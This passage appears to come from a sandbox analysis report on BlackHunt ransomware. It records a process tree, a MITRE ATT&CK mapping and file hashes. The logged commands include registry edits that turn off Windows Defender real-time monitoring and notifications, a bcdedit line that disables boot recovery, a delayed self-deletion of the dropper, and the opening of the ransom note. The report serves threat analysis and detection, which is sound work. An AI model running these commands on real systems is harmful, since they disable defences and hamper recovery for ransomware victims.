C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:16812
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:20216
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:16792
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:20212
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:16824
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe"2⤵PID:20360
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:16636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:20324 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:16936
-
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f1⤵PID:4964
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f1⤵PID:2152
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f1⤵PID:4940
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f1⤵PID:3700
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:2356
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No1⤵
- Modifies boot configuration data using bcdedit
PID:9152
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:2648
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:11900
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:12524
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:18552
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5b15cf5b2997a8e5ff7ba978521709909
SHA149e71608d279e2e20ff4985fb70f5d7253c9893f
SHA256e0afff60d589d7bb000ba6799151811a92589e3b89ebe14eb0f87bcf34375157
SHA512d93ca94439a4c5eaae696dac67ee9e1f3e500d378fca3d6d9712e56a1b7089214b6e0ae076fae34311b3cd86ea788902ee520e2e2fae8955bcf545a0b83788aa
-
Filesize
12KB
MD5556fee70de4e6deb3c9fef342c5a88a2
SHA1a2136674206ecb6fa7287f09cab9906de14b1462
SHA25660abba83b07b0f65b8e7a635775159e3312a51fab86324c582e50c517dcb4fa9
SHA5127832923bab1da64cda152106c6b3d03512228e79e065d1a17c45c6e9b6610d5c49b8cfa132eff953c06c96dd0f09b224b92782a19dd8a7cf2a4d06695f944d8d
-
Filesize
684B
MD532b15973a1030c297b72643a0f7ff38d
SHA1bced12f3776830b14816efebd8efce24a6aef92e
SHA2564159198002254ac6d8c4c48a95127b47d7fd2b8830539481ef480cd4a27da847
SHA5125888f9fd6a47c5ea41f66948b6794e88f7739cd7dd4b19bfea7a54a82cec89ea41c5ba8888f7dc1a7736411a223bb73ecbb801a8b3b30b6b719835973d6a168c
-
Filesize
12KB
MD5e7ef462f494df2b92e9186ee19e7e448
SHA1404e5394f3981e079a05c0f7e7691a9e481f4061
SHA256aa5ec698c2cf10353f001f812c5224dea9b60c5d13ab98ee7b497f3399ad9555
SHA5126a2dfe3d315b89828b0d7c4aeaaaf98fc64cb6946e0f66ba023bd47303ed1f1c956249261ef2fb38f1851b51715183a45a6f1f3f2e5f9b62ee4710754bdc8b17